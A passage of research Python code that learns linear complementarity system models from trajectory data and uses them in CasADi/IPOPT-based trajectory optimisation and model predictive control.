for k in range(max_iter):
# mini batch dataset
shuffle_index = np.random.permutation(train_data_size)[0:minibatch_size]
x_minibatch = train_x_batch[shuffle_index]
u_minibatch = train_u_batch[shuffle_index]
x_next_minibatch = train_x_next_batch[shuffle_index]
# compute the lambda batch
lam_opt_mini_batch, loss_opt_mini_batch = lcs_learner.compute_lambda(x_minibatch, u_minibatch)
# regression for the dynamics
dyn_loss_opt = lcs_learner.dyn_regression(x_minibatch, u_minibatch, lam_opt_mini_batch, x_next_minibatch)
# compute the gradient
dlcp_theta = lcs_learner.gradient_step(x_minibatch, u_minibatch, x_next_minibatch, lam_opt_mini_batch)
# store and update
lcs_learner.val_lcp_theta = optimizier.step(lcs_learner.val_lcp_theta, dlcp_theta)
if print_level is not 0:
if k % 100 == 0:
# on the prediction using the current learned lcs
pred_x_next_batch, pred_lam_batch = lcs_learner.dyn_prediction(train_x_batch, train_u_batch)
# compute the prediction error
error_x_next_batch = pred_x_next_batch - train_x_next_batch
relative_error = (
la.norm(error_x_next_batch, axis=1) / (la.norm(train_x_next_batch, axis=1) + 0.0001)).mean()
print(
'lcs learning iter', k,
'| loss:', dyn_loss_opt,
'| grad:', norm_2(dlcp_theta),
'| PRE:', relative_error,
)
# learn a lcs model from the sampled data using l4dc paper
def LCSLearning(lcs_learner, optimizer, control_traj_batch, true_state_traj_batch,
max_iter=5000, minibatch_size=100):
# converting the data form
batch_size = len(control_traj_batch)
train_u_batch = []
train_x_batch = []
train_x_next_batch = []
for i in range(batch_size):
train_u_batch += [control_traj_batch[i]]
train_x_batch += [true_state_traj_batch[i][0:-1]]
train_x_next_batch += [true_state_traj_batch[i][1:]]
train_u_batch = np.vstack(train_u_batch)
train_x_next_batch = np.vstack(train_x_next_batch)
train_x_batch = np.vstack(train_x_batch)
# do the learning iteration
train_data_size = train_u_batch.shape[0]
epsilon = np.logspace(3, -2, max_iter)
for k in range(max_iter):
# mini batch dataset
shuffle_index = np.random.permutation(train_data_size)[0:minibatch_size]
x_minibatch = train_x_batch[shuffle_index]
u_minibatch = train_u_batch[shuffle_index]
x_next_minibatch = train_x_next_batch[shuffle_index]
# compute the lambda batch
lcs_learner.differetiable(gamma=1e-3, epsilon=epsilon[k])
lam_phi_opt_mini_batch, loss_opt_batch = lcs_learner.compute_lambda(x_minibatch, u_minibatch, x_next_minibatch)
# compute the gradient
dtheta, loss, dyn_loss, lcp_loss, dtheta_hessian = \
lcs_learner.gradient_step(x_minibatch, u_minibatch, x_next_minibatch, lam_phi_opt_mini_batch,
second_order=False)
# store and update
lcs_learner.val_theta = optimizer.step(lcs_learner.val_theta, dtheta)
if k % 100 == 0:
# on the prediction using the current learned lcs
pred_x_next_batch, pred_lam_batch = lcs_learner.dyn_prediction(train_x_batch, train_u_batch)
# compute the prediction error
error_x_next_batch = pred_x_next_batch - train_x_next_batch
relative_error = (
la.norm(error_x_next_batch, axis=1) / (la.norm(train_x_next_batch, axis=1) + 0.0001)).mean()
print(
k,
'| loss:', loss,
'| dyn_loss:', dyn_loss,
'| lcp_loss:', lcp_loss,
'| grad:', norm_2(dtheta),
'| PRE:', relative_error,
'| epsilon:', epsilon[k],
)
# compute the gradient of the control input using the recovery matrix (Jin. et al. IJRR)
# evaluation object to evaluate the learned lcs model using a control cost function
class LCS_evaluation:
def __init__(self, lcs_learner):
self.name = 'lcs evaluation'
# define the system variables
self.n_state = lcs_learner.n_state
self.n_control = lcs_learner.n_control
self.n_lam = lcs_learner.n_lam
# define the system variables
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.lam = SX.sym('lam', self.n_lam)
def setCostFunction(self, Q, R, QN, control_horizon):
self.Q = DM(Q)
self.R = DM(R)
self.QN = DM(QN)
self.control_horizon = control_horizon
# define the control cost function
self.path_cost = dot(self.x, self.Q @ self.x) + dot(self.u, self.R @ self.u)
self.final_cost = dot(self.x, self.QN @ self.x)
self.path_cost_fn = Function('path_cost_fn', [self.x, self.u], [self.path_cost])
self.final_cost_fn = Function('final_cost_fn', [self.x], [self.final_cost])
def computeCost(self, control_traj_batch, state_traj_batch):
cost_batch = []
batch_size = len(control_traj_batch)
for i in range(batch_size):
u_traj = control_traj_batch[i]
x_traj = state_traj_batch[i]
cost = 0.0
for t in range(self.control_horizon):
curr_x = x_traj[t]
curr_u = u_traj[t]
cost += self.path_cost_fn(curr_x, curr_u)
cost += self.final_cost_fn(x_traj[-1])
cost_batch += [cost]
return cost_batch
def differentiable(self):
self.A = SX.sym('A', self.n_state, self.n_state)
self.B = SX.sym('B', self.n_state, self.n_control)
self.C = SX.sym('C', self.n_state, self.n_lam)
self.D = SX.sym('D', self.n_lam, self.n_state)
self.E = SX.sym('E', self.n_lam, self.n_control)
self.F = SX.sym('F', self.n_lam, self.n_lam)
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
vec(self.D), vec(self.E), vec(self.F),
vec(self.lcp_offset))
# define the dynamics
self.f = self.A @ self.x + self.B @ self.u + self.C @ self.lam
# define the gradient of lam with respect to lcp_theta
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
g = diag(self.lam) @ self.dist
dg_dlam = jacobian(g, self.lam)
dg_dx = jacobian(g, self.x)
dg_du = jacobian(g, self.u)
dlam_dx = -inv(dg_dlam) @ dg_dx
dlam_du = -inv(dg_dlam) @ dg_du
# differentiate
df_dx = jacobian(self.f, self.x) + jacobian(self.f, self.lam) @ dlam_dx
df_du = jacobian(self.f, self.u) + jacobian(self.f, self.lam) @ dlam_du
self.dfdx_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_dx])
self.dfdu_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_du])
# compute the gradient of the cost function
self.dcdx = jacobian(self.path_cost, self.x).T
self.dcdu = jacobian(self.path_cost, self.u).T
self.dhdx = jacobian(self.final_cost, self.x).T
# establish the functions for the above gradient
self.dcdx_fn = Function('dcdx_fn', [self.x, self.u], [self.dcdx])
self.dcdu_fn = Function('dcdu_fn', [self.x, self.u], [self.dcdu])
self.dhdx_fn = Function('dhdx_fn', [self.x], [self.dhdx])
# I use the single shooting method to update the control sequence but it does not work
def Evaluate(self, lcs_learner, init_state_batch, control_traj_batch, true_state_traj_batch):
lcs_theta = lcs_learner.computeLCSMats()
# compute the state batch_trajectory
pred_state_traj_batch, pred_lam_traj_batch = lcs_learner.sim_dyn(init_state_batch, control_traj_batch)
# # debug for plotting
# plt.plot(true_state_traj_batch[0])
# plt.plot(pred_state_traj_batch[0])
# plt.show()
# control_update trajectory
control_update_traj_batch = []
model_cost_batch = []
true_sys_cost_batch = []
batch_size = init_state_batch.shape[0]
for i in range(batch_size):
u_traj = control_traj_batch[i]
pred_x_traj = pred_state_traj_batch[i]
pred_lam_traj = pred_lam_traj_batch[i]
true_x_traj = true_state_traj_batch[i]
control_horizon = u_traj.shape[0]
# compute the recover matrix (see Jin et al. IJRR for details)
curr_x = pred_x_traj[0]
curr_u = u_traj[0]
curr_lam = pred_lam_traj[0]
next_x = pred_x_traj[1]
next_u = u_traj[1]
next_lam = pred_lam_traj[1]
curr_dfdu = self.dfdu_fn(curr_x, curr_u, curr_lam, lcs_theta)
curr_dcdu = self.dcdu_fn(curr_x, curr_u)
next_dfdx = self.dfdx_fn(next_x, next_u, next_lam, lcs_theta)
next_dcdx = self.dcdx_fn(next_x, next_u)
H1 = curr_dfdu.T @ next_dcdx + curr_dcdu
H2 = curr_dfdu.T @ next_dfdx.T
model_cost = self.path_cost_fn(curr_x, curr_u)
true_sys_cost = self.path_cost_fn(true_x_traj[0], curr_u)
for t in range(1, control_horizon - 1):
curr_x = pred_x_traj[t]
curr_u = u_traj[t]
next_x = pred_x_traj[t + 1]
next_u = u_traj[t + 1]
curr_dfdu = self.dfdu_fn(curr_x, curr_u, curr_lam, lcs_theta)
curr_dcdu = self.dcdu_fn(curr_x, curr_u)
next_dfdx = self.dfdx_fn(next_x, next_u, next_lam, lcs_theta)
next_dcdx = self.dcdx_fn(next_x, next_u)
H1 = vertcat(H1 + H2 @ next_dcdx,
curr_dfdu.T @ next_dcdx + curr_dcdu)
H2 = vertcat(H2 @ next_dfdx.T,
curr_dfdu.T @ next_dfdx.T)
model_cost += self.path_cost_fn(curr_x, curr_u)
true_sys_cost += self.path_cost_fn(true_x_traj[t], curr_u)
curr_x = pred_x_traj[control_horizon - 1]
curr_u = u_traj[control_horizon - 1]
curr_dfdu = self.dfdu_fn(curr_x, curr_u, curr_lam, lcs_theta)
curr_dcdu = self.dcdu_fn(curr_x, curr_u)
next_x = pred_x_traj[control_horizon]
next_dhdx = self.dhdx_fn(next_x)
H1 = vertcat(H1 + H2 @ next_dhdx,
curr_dfdu.T @ next_dhdx + curr_dcdu).full().flatten()
model_cost += self.path_cost_fn(curr_x, curr_u)
true_sys_cost += self.path_cost_fn(true_x_traj[control_horizon - 1], curr_u)
model_cost += self.final_cost_fn(next_x)
true_sys_cost += self.final_cost_fn(true_x_traj[control_horizon])
control_update_traj_batch += [H1.reshape((-1, self.n_control))]
model_cost_batch += [model_cost]
true_sys_cost_batch += [true_sys_cost]
return control_update_traj_batch, model_cost_batch, true_sys_cost_batch
def Update(self, control_traj_batch, control_update_batch, step_size=1e-4):
batch_size = len(control_traj_batch)
new_control_traj_batch = []
for i in range(batch_size):
control_traj = control_traj_batch[i]
update_traj = control_update_batch[i]
new_control_traj = control_traj - step_size * update_traj
new_control_traj_batch += [new_control_traj]
return new_control_traj_batch
# Then I think about to update the control sequence using multiple-shooting (this can be further improved)
def initializeUpdater(self, proximity_epsilon=1e-3):
self.differentiable()
# Start with an empty NLP
w = []
w0 = []
lbw = []
ubw = []
J = 0
g = []
lbg = []
ubg = []
p = []
# "Lift" initial conditions
Xk = casadi.SX.sym('X0', self.n_state)
w += [Xk]
lbw += np.zeros(self.n_state).tolist()
ubw += np.zeros(self.n_state).tolist()
w0 += np.zeros(self.n_state).tolist()
# formulate the NLP
for k in range(self.control_horizon):
# New NLP variable for the control
Uk = casadi.SX.sym('U_' + str(k), self.n_control)
w += [Uk]
lbw += self.n_control * [-inf]
ubw += self.n_control * [inf]
w0 += self.n_control * [0.]
# new NLP variable for the complementarity variable
Lamk = casadi.SX.sym('lam' + str(k), self.n_lam)
w += [Lamk]
lbw += self.n_lam * [0.]
ubw += self.n_lam * [inf]
w0 += self.n_lam * [0.]
# Add complementarity equation
g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
lbg += self.n_lam * [0.]
ubg += self.n_lam * [inf]
g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
lbg += [0.]
ubg += [0.]
# Integrate till the end of the interval
Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
# compute the current cost
Uk_ref = SX.sym('Uk_ref' + str(k), self.n_control)
p += [Uk_ref]
Ck = dot(Xk, self.Q @ Xk) + dot(Uk, self.R @ Uk) + dot(Uk - Uk_ref, Uk - Uk_ref) / proximity_epsilon
J = J + Ck
# New NLP variable for state at end of interval
Xk = casadi.SX.sym('X_' + str(k + 1), self.n_state)
w += [Xk]
lbw += self.n_state * [-inf]
ubw += self.n_state * [inf]
w0 += self.n_state * [0.]
# Add constraint for the dynamics
g += [Xnext - Xk]
lbg += self.n_state * [0.]
ubg += self.n_state * [0.]
# Add the final cost
J = J + dot(Xk, self.QN @ Xk)
# Create an NLP solver and solve
p += [self.lcs_theta]
opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': vertcat(*p)}
self.oc_solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
self.lbw = DM(lbw)
self.ubw = DM(ubw)
self.lbg = DM(lbg)
self.ubg = DM(ubg)
self.w0 = DM(w0)
# this is warming start for acceleration of ipopt solver
self.warm_start = []
def EvaluateMS(self, lcs_learner, init_state_batch, control_traj_batch):
if not hasattr(self, 'solver'):
self.initializeUpdater()
lcs_theta = lcs_learner.computeLCSMats()
# compute the state batch_trajectory
pred_state_traj_batch, pred_lam_traj_batch = lcs_learner.sim_dyn(init_state_batch, control_traj_batch)
# # debug for plotting
# plt.plot(true_state_traj_batch[0])
# plt.plot(pred_state_traj_batch[0])
# plt.show()
# ===============================================
# do the update of the control sequence
batch_size = len(control_traj_batch)
updated_control_traj_batch = []
updated_pred_state_traj_batch = []
updated_pred_lam_traj_batch = []
# this is for warm start for the next iteration
w_opt_batch = []
for i in range(batch_size):
u_traj = control_traj_batch[i]
init_state = init_state_batch[i]
# step upt the oc solver
lbw = self.lbw
ubw = self.ubw
lbw[0:self.n_state] = DM(init_state)
ubw[0:self.n_state] = DM(init_state)
oc_para = vertcat(u_traj.flatten(), lcs_theta)
# warm start
if not self.warm_start:
init_w = self.w0
init_w[0:self.n_state] = DM(init_state)
else:
init_w = self.warm_start[i]
init_w[0:self.n_state] = DM(init_state)
# Solve the NLP
sol = self.oc_solver(x0=init_w, lbx=lbw, ubx=ubw, lbg=self.lbg, ubg=self.ubg, p=oc_para)
w_opt = sol['x']
w_opt_batch += [w_opt]
# extract the optimal control and state
sol_traj = w_opt[0:self.control_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
(self.n_state + self.n_control + self.n_lam, -1))
x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
w_opt[self.control_horizon * (self.n_state + self.n_control + self.n_lam):]).T
u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T
lam_traj = sol_traj[self.n_state + self.n_control:, :].T
updated_control_traj_batch += [u_traj.full()]
updated_pred_state_traj_batch += [x_traj.full()]
updated_pred_lam_traj_batch += [lam_traj.full()]
self.warm_start = w_opt_batch
return updated_control_traj_batch
# compute the gradient of the control input using the recovery matrix (Jin. et al. IJRR)
# evaluation object to evaluate the learned lcs model using a control cost function
# random_initial condition
class LCS_evaluation2:
def __init__(self, lcs_learner):
self.name = 'lcs evaluation'
# define the system variables
self.n_state = lcs_learner.n_state
self.n_control = lcs_learner.n_control
self.n_lam = lcs_learner.n_lam
# define the system variables
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.lam = SX.sym('lam', self.n_lam)
def setCostFunction(self, Q, R, QN, control_horizon):
self.Q = DM(Q)
self.R = DM(R)
self.QN = DM(QN)
self.control_horizon = control_horizon
# define the control cost function
self.path_cost = dot(self.x, self.Q @ self.x) + dot(self.u, self.R @ self.u)
self.final_cost = dot(self.x, self.QN @ self.x)
self.path_cost_fn = Function('path_cost_fn', [self.x, self.u], [self.path_cost])
self.final_cost_fn = Function('final_cost_fn', [self.x], [self.final_cost])
def computeCost(self, control_traj_batch, state_traj_batch):
cost_batch = []
batch_size = len(control_traj_batch)
for i in range(batch_size):
u_traj = control_traj_batch[i]
x_traj = state_traj_batch[i]
cost = 0.0
for t in range(self.control_horizon):
curr_x = x_traj[t]
curr_u = u_traj[t]
cost += self.path_cost_fn(curr_x, curr_u)
cost += self.final_cost_fn(x_traj[-1])
cost_batch += [cost]
return cost_batch
def differentiable(self):
self.A = SX.sym('A', self.n_state, self.n_state)
self.B = SX.sym('B', self.n_state, self.n_control)
self.C = SX.sym('C', self.n_state, self.n_lam)
self.D = SX.sym('D', self.n_lam, self.n_state)
self.E = SX.sym('E', self.n_lam, self.n_control)
self.F = SX.sym('F', self.n_lam, self.n_lam)
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
vec(self.D), vec(self.E), vec(self.F),
vec(self.lcp_offset))
# define the dynamics
self.f = self.A @ self.x + self.B @ self.u + self.C @ self.lam
# define the gradient of lam with respect to lcp_theta
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
g = diag(self.lam) @ self.dist
dg_dlam = jacobian(g, self.lam)
dg_dx = jacobian(g, self.x)
dg_du = jacobian(g, self.u)
dlam_dx = -inv(dg_dlam) @ dg_dx
dlam_du = -inv(dg_dlam) @ dg_du
# differentiate
df_dx = jacobian(self.f, self.x) + jacobian(self.f, self.lam) @ dlam_dx
df_du = jacobian(self.f, self.u) + jacobian(self.f, self.lam) @ dlam_du
self.dfdx_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_dx])
self.dfdu_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_du])
# compute the gradient of the cost function
self.dcdx = jacobian(self.path_cost, self.x).T
self.dcdu = jacobian(self.path_cost, self.u).T
self.dhdx = jacobian(self.final_cost, self.x).T
# establish the functions for the above gradient
self.dcdx_fn = Function('dcdx_fn', [self.x, self.u], [self.dcdx])
self.dcdu_fn = Function('dcdu_fn', [self.x, self.u], [self.dcdu])
self.dhdx_fn = Function('dhdx_fn', [self.x], [self.dhdx])
# Then I think about to update the control sequence using multiple-shooting (this can be further improved)
def initializeUpdater(self, proximity_epsilon=1e-2):
self.differentiable()
# Start with an empty NLP
w = []
w0 = []
lbw = []
ubw = []
J = 0
g = []
lbg = []
ubg = []
p = []
# "Lift" initial conditions
Xk = casadi.SX.sym('X0', self.n_state)
w += [Xk]
lbw += np.zeros(self.n_state).tolist()
ubw += np.zeros(self.n_state).tolist()
w0 += np.zeros(self.n_state).tolist()
# formulate the NLP
for k in range(self.control_horizon):
# New NLP variable for the control
Uk = casadi.SX.sym('U_' + str(k), self.n_control)
w += [Uk]
lbw += self.n_control * [-inf]
ubw += self.n_control * [inf]
w0 += self.n_control * [0.]
# new NLP variable for the complementarity variable
Lamk = casadi.SX.sym('lam' + str(k), self.n_lam)
w += [Lamk]
lbw += self.n_lam * [0.]
ubw += self.n_lam * [inf]
w0 += self.n_lam * [0.]
# Add complementarity equation
g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
lbg += self.n_lam * [0.]
ubg += self.n_lam * [inf]
g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
lbg += [0.]
ubg += [0.]
# Integrate till the end of the interval
Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
# compute the current cost
Uk_ref = SX.sym('Uk_ref' + str(k), self.n_control)
p += [Uk_ref]
Ck = dot(Xk, self.Q @ Xk) + dot(Uk, self.R @ Uk) + dot(Uk - Uk_ref, Uk - Uk_ref) / proximity_epsilon
J = J + Ck
# New NLP variable for state at end of interval
Xk = casadi.SX.sym('X_' + str(k + 1), self.n_state)
w += [Xk]
lbw += self.n_state * [-inf]
ubw += self.n_state * [inf]
w0 += self.n_state * [0.]
# Add constraint for the dynamics
g += [Xnext - Xk]
lbg += self.n_state * [0.]
ubg += self.n_state * [0.]
# Add the final cost
J = J + dot(Xk, self.QN @ Xk)
# Create an NLP solver and solve
p += [self.lcs_theta]
opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': vertcat(*p)}
self.oc_solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
self.lbw = DM(lbw)
self.ubw = DM(ubw)
self.lbg = DM(lbg)
self.ubg = DM(ubg)
self.w0 = DM(w0)
self.prev_init_state_batch = []
def EvaluateMS(self, lcs_learner, init_state_batch, control_traj_batch):
if not hasattr(self, 'oc_solver'):
self.initializeUpdater()
lcs_theta = lcs_learner.computeLCSMats()
# compute the state batch_trajectory
pred_state_traj_batch, pred_lam_traj_batch = lcs_learner.sim_dyn(init_state_batch, control_traj_batch)
# # debug for plotting
# plt.plot(true_state_traj_batch[0])
# plt.plot(pred_state_traj_batch[0])
# plt.show()
# ===============================================
# do the update of the control sequence
batch_size = len(control_traj_batch)
updated_control_traj_batch = []
updated_pred_state_traj_batch = []
updated_pred_lam_traj_batch = []
# this is for warm start for the next iteration
curr_init_state_batch = []
for i in range(batch_size):
init_state = init_state_batch[i]
# step upt the oc solver
lbw = self.lbw
ubw = self.ubw
lbw[0:self.n_state] = DM(init_state)
ubw[0:self.n_state] = DM(init_state)
init_w = self.w0
init_w[0:self.n_state] = DM(init_state)
# ========================= no action
# u_traj = control_traj_batch[i]
# oc_para = vertcat(u_traj.flatten(), lcs_theta)
# ========================= do the correspondence
# if len(self.prev_init_state_batch) == 0:
# u_traj = control_traj_batch[i]
# oc_para = vertcat(u_traj.flatten(), lcs_theta)
# else:
# # check the current initial is close to which previous initial condition
# close_index = find_closest(self.prev_init_state_batch, init_state)
# u_traj = control_traj_batch[close_index]
# oc_para = vertcat(u_traj.flatten(), lcs_theta)
# curr_init_state_batch += [init_state]
# ========================= do the meaning
sum_u_traj = 0
for j in range(batch_size):
sum_u_traj += control_traj_batch[i]
mean_u_traj = sum_u_traj / batch_size
oc_para = vertcat(mean_u_traj.flatten(), lcs_theta)
# Solve the NLP
sol = self.oc_solver(x0=init_w, lbx=lbw, ubx=ubw, lbg=self.lbg, ubg=self.ubg, p=oc_para)
w_opt = sol['x']
# extract the optimal control and state
sol_traj = w_opt[0:self.control_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
(self.n_state + self.n_control + self.n_lam, -1))
x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
w_opt[self.control_horizon * (self.n_state + self.n_control + self.n_lam):]).T
u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T
lam_traj = sol_traj[self.n_state + self.n_control:, :].T
updated_control_traj_batch += [u_traj.full()]
updated_pred_state_traj_batch += [x_traj.full()]
updated_pred_lam_traj_batch += [lam_traj.full()]
self.prev_init_state_batch = curr_init_state_batch
return updated_control_traj_batch
# compute the gradient of the control input using the recovery matrix (Jin. et al. IJRR)
# evaluation object to evaluate the learned lcs model using a control cost function
# random_initial condition
class MPC_Controller:
def __init__(self, lcs_learner):
self.name = 'lcs evaluation'
# define the system variables
self.n_state = lcs_learner.n_state
self.n_control = lcs_learner.n_control
self.n_lam = lcs_learner.n_lam
# define the system variables
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.lam = SX.sym('lam', self.n_lam)
# define the system matrices
self.A = SX.sym('A', self.n_state, self.n_state)
self.B = SX.sym('B', self.n_state, self.n_control)
self.C = SX.sym('C', self.n_state, self.n_lam)
self.D = SX.sym('D', self.n_lam, self.n_state)
self.E = SX.sym('E', self.n_lam, self.n_control)
self.F = SX.sym('F', self.n_lam, self.n_lam)
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
vec(self.D), vec(self.E), vec(self.F),
vec(self.lcp_offset))
# define the dynamics
self.f = self.A @ self.x + self.B @ self.u + self.C @ self.lam
def setCostFunction(self, Q, R, QN):
self.Q = DM(Q)
self.R = DM(R)
self.QN = DM(QN)
# define the control cost function
self.path_cost = dot(self.x, self.Q @ self.x) + dot(self.u, self.R @ self.u)
self.final_cost = dot(self.x, self.QN @ self.x)
self.path_cost_fn = Function('path_cost_fn', [self.x, self.u], [self.path_cost])
self.final_cost_fn = Function('final_cost_fn', [self.x], [self.final_cost])
def computeCost(self, control_traj_batch, state_traj_batch):
cost_batch = []
batch_size = len(control_traj_batch)
for i in range(batch_size):
u_traj = control_traj_batch[i]
x_traj = state_traj_batch[i]
cost = 0.0
control_horizon = u_traj.shape[0]
for t in range(control_horizon):
curr_x = x_traj[t]
curr_u = u_traj[t]
cost += self.path_cost_fn(curr_x, curr_u)
cost += self.final_cost_fn(x_traj[-1])
cost_batch += [cost]
return cost_batch
def differentiable(self):
# define the gradient of lam with respect to lcp_theta
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
g = diag(self.lam) @ self.dist
dg_dlam = jacobian(g, self.lam)
dg_dx = jacobian(g, self.x)
dg_du = jacobian(g, self.u)
dlam_dx = -inv(dg_dlam) @ dg_dx
dlam_du = -inv(dg_dlam) @ dg_du
# differentiate
df_dx = jacobian(self.f, self.x) + jacobian(self.f, self.lam) @ dlam_dx
df_du = jacobian(self.f, self.u) + jacobian(self.f, self.lam) @ dlam_du
self.dfdx_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_dx])
self.dfdu_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_du])
# compute the gradient of the cost function
self.dcdx = jacobian(self.path_cost, self.x).T
self.dcdu = jacobian(self.path_cost, self.u).T
self.dhdx = jacobian(self.final_cost, self.x).T
# establish the functions for the above gradient
self.dcdx_fn = Function('dcdx_fn', [self.x, self.u], [self.dcdx])
self.dcdu_fn = Function('dcdu_fn', [self.x, self.u], [self.dcdu])
self.dhdx_fn = Function('dhdx_fn', [self.x], [self.dhdx])
def initializeMPC(self, mpc_horizon):
self.mpc_horizon = mpc_horizon
# Start with an empty NLP
w = []
w0 = []
lbw = []
ubw = []
J = 0
g = []
lbg = []
ubg = []
lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
vec(self.D), vec(self.E), vec(self.F),
vec(self.lcp_offset))
# "Lift" initial conditions
Xk = casadi.SX.sym('X0', self.n_state)
w += [Xk]
lbw += np.zeros(self.n_state).tolist()
ubw += np.zeros(self.n_state).tolist()
w0 += np.zeros(self.n_state).tolist()
# formulate the NLP
for k in range(self.mpc_horizon):
# New NLP variable for the control
Uk = casadi.SX.sym('U_' + str(k), self.n_control)
w += [Uk]
lbw += self.n_control * [-inf]
ubw += self.n_control * [inf]
w0 += self.n_control * [0.]
# new NLP variable for the complementarity variable
Lamk = casadi.SX.sym('lam' + str(k), self.n_lam)
w += [Lamk]
lbw += self.n_lam * [0.]
ubw += self.n_lam * [inf]
w0 += self.n_lam * [0.]
# Add complementarity equation
g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
lbg += self.n_lam * [0.]
ubg += self.n_lam * [inf]
g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
lbg += [0.]
ubg += [0.]
# Integrate till the end of the interval
Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
Ck = dot(Xk, self.Q @ Xk) + dot(Uk, self.R @ Uk)
J = J + Ck
# New NLP variable for state at end of interval
Xk = casadi.SX.sym('X_' + str(k + 1), self.n_state)
w += [Xk]
lbw += self.n_state * [-inf]
ubw += self.n_state * [inf]
w0 += self.n_state * [0.]
# Add constraint for the dynamics
g += [Xnext - Xk]
lbg += self.n_state * [0.]
ubg += self.n_state * [0.]
# Add the final cost
J = J + dot(Xk, self.QN @ Xk)
# Create an NLP solver and solve
opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': lcs_theta}
self.oc_solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
self.lbw = DM(lbw)
self.ubw = DM(ubw)
self.lbg = DM(lbg)
self.ubg = DM(ubg)
self.w0 = DM(w0)
def mpc(self, lcs_learner, state_batch, lcs_theta=None):
# take out the current lcs system parameter
if lcs_theta is None:
lcs_theta = lcs_learner.computeLCSMats()
else:
lcs_theta = lcs_theta
# do the one step mpc
state_batch = list(state_batch)
batch_size = len(state_batch)
control_batch = []
for i in range(batch_size):
state = state_batch[i]
# set the optimal control bounds
lbw = self.lbw
ubw = self.ubw
init_w = self.w0
lbw[0:self.n_state] = DM(state)
ubw[0:self.n_state] = DM(state)
init_w[0:self.n_state] = DM(state)
# set the optimal control parameter
oc_parameters = DM(lcs_theta)
sol = self.oc_solver(x0=self.w0, lbx=self.lbw, ubx=self.ubw, lbg=self.lbg, ubg=self.ubg, p=oc_parameters)
w_opt = sol['x']
self.w0 = w_opt
# extract the optimal control and state
sol_traj = w_opt[0:self.mpc_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
(self.n_state + self.n_control + self.n_lam, -1))
x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
w_opt[self.mpc_horizon * (self.n_state + self.n_control + self.n_lam):]).T.full()
u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T.full()
lam_traj = sol_traj[self.n_state + self.n_control:, :].T.full()
control_batch += [w_opt[self.n_state:self.n_state + self.n_control].full().flatten()]
return control_batch
def mpc_step(self, lcs_learner, curr_state, lcs_theta=None):
# take out the current lcs system parameter
if lcs_theta is None:
lcs_theta = lcs_learner.computeLCSMats()
else:
lcs_theta = lcs_theta
# set the optimal control bounds
lbw = self.lbw
ubw = self.ubw
init_w = self.w0
lbw[0:self.n_state] = DM(curr_state)
ubw[0:self.n_state] = DM(curr_state)
init_w[0:self.n_state] = DM(curr_state)
# set the optimal control parameter
oc_parameters = DM(lcs_theta)
sol = self.oc_solver(x0=self.w0, lbx=self.lbw, ubx=self.ubw, lbg=self.lbg, ubg=self.ubg, p=oc_parameters)
w_opt = sol['x']
self.w0 = w_opt
curr_control = w_opt[self.n_state:self.n_state + self.n_control].full().flatten()
return curr_control
def find_closest(candidate_rows, query):
n = len(candidate_rows)
min_distance = inf
closest_index = 0
for i in range(n):
candidate = candidate_rows[i]
current_distance = norm_2(candidate - query)
if current_distance < min_distance:
min_distance = current_distance
closest_index = i
return closest_index
def dataReorgnize(batch_traj):
batch_size = len(batch_traj[0])
traj_horizon = len(batch_traj)
traj_batch = []
for batch_i in range(batch_size):
traj = []
for t in range(traj_horizon):
traj += [batch_traj[t][batch_i]]
traj = np.array(traj)
traj_batch += [traj]
return traj_batch
| 39.427984
| 120
| 0.58427
| 12,814
| 86,229
| 3.667473
| 0.031372
| 0.037132
| 0.032557
| 0.021747
| 0.891946
| 0.860475
| 0.840898
